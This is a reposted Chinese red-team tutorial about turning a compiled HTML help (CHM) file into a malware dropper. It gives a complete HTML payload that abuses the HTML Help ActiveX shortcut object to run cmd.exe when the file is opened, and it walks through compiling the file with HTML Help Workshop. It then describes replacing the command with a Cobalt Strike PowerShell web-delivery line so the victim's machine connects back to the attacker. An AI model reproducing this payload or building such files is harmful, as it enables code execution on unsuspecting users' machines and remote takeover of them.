黑客(红队)攻防中内网利用chm文件进行getshell上线

渗透技巧 12个月前 admin
224 0 0

前言:

  今天这个文章的来源是前几天和一位师傅的交流

黑客(红队)攻防中内网利用chm文件进行getshell上线

黑客(红队)攻防中内网利用chm文件进行getshell上线

chm:

  直接说chm文件师傅们可能比较懵但是看一下chm文件的图标可能就记起来了

黑客(红队)攻防中内网利用chm文件进行getshell上线

chm全称Compiled Help Manual利用HTML作源码是微软新一代帮助文件格式。

HTML编译:

  要将HTML编译为chm需要借助HTML Help Workshop工具

https://softpedia-secure-download.com/dl/18835165e5cb1c12b57394383d4aeccb/64cfb352/100068169/software/authoring/htmlhelp.exe

下载完成之后先新建一个.hhp后缀的文件:

黑客(红队)攻防中内网利用chm文件进行getshell上线

再新建一个HTML文件:

黑客(红队)攻防中内网利用chm文件进行getshell上线

 <!DOCTYPE html><html><head><title>Mousejack replay</title>        <head></head>        <body>hellp word<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>            <PARAM name="Command" value="ShortCut">                 <PARAM name="Button" value="Bitmap::shortcut">                     <PARAM name="Item1" value=',cmd.exe'>                         <PARAM name="Item2" value="273,1,1">                        </OBJECT><SCRIPT>x.Click();</SCRIPT>        </body></html>

黑客(红队)攻防中内网利用chm文件进行getshell上线

然后打开hhw工具:

黑客(红队)攻防中内网利用chm文件进行getshell上线

点击File–>New:

黑客(红队)攻防中内网利用chm文件进行getshell上线

再点击Project:

黑客(红队)攻防中内网利用chm文件进行getshell上线

黑客(红队)攻防中内网利用chm文件进行getshell上线

选择刚刚创建的test.hhp文件:

黑客(红队)攻防中内网利用chm文件进行getshell上线

黑客(红队)攻防中内网利用chm文件进行getshell上线

再点击HTML files:

黑客(红队)攻防中内网利用chm文件进行getshell上线

再点击Add:

黑客(红队)攻防中内网利用chm文件进行getshell上线

黑客(红队)攻防中内网利用chm文件进行getshell上线

添加刚刚的test.html文件,最后点击完成:

黑客(红队)攻防中内网利用chm文件进行getshell上线

查看源码有没有错误,查看完后点击File–>Compile:

黑客(红队)攻防中内网利用chm文件进行getshell上线

黑客(红队)攻防中内网利用chm文件进行getshell上线

点击Compile:

黑客(红队)攻防中内网利用chm文件进行getshell上线

出现了生成日志按照日志位置找到test.chm文件:

黑客(红队)攻防中内网利用chm文件进行getshell上线

双击运行:

黑客(红队)攻防中内网利用chm文件进行getshell上线

成功弹出cmd

利用chm进行CS上线:

  首先启动Kali上部署CS:

黑客(红队)攻防中内网利用chm文件进行getshell上线

本地连接:

黑客(红队)攻防中内网利用chm文件进行getshell上线

黑客(红队)攻防中内网利用chm文件进行getshell上线

点击攻击Attacks–>Web Druve-by–>Scripted Web Delivert生成一个powershell上线命令

黑客(红队)攻防中内网利用chm文件进行getshell上线

然后更改刚刚HTML源码中的Value值

黑客(红队)攻防中内网利用chm文件进行getshell上线

但是CS生成的payload中要在powershell.exe前后都加个逗号(图中前面忘加了)

黑客(红队)攻防中内网利用chm文件进行getshell上线

黑客(红队)攻防中内网利用chm文件进行getshell上线

准备好所需的文件

黑客(红队)攻防中内网利用chm文件进行getshell上线


黑客(红队)攻防中内网利用chm文件进行getshell上线

编译生成red.chm

黑客(红队)攻防中内网利用chm文件进行getshell上线

拿到测试环境,直接命令行启动:

黑客(红队)攻防中内网利用chm文件进行getshell上线

黑客(红队)攻防中内网利用chm文件进行getshell上线

成功上线

总结:

  chm上线的操作大多在win11以下设备上成功率较高,且操作没有以往的难度大,所以本文字数也较少,师傅们也可自行思考利用其它payload达到出其不意的效果。


原文始发于微信公众号(flower安全混子):黑客(红队)攻防中内网利用chm文件进行getshell上线

版权声明:admin 发表于 2023年8月7日 下午9:05。
转载请注明:黑客(红队)攻防中内网利用chm文件进行getshell上线 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...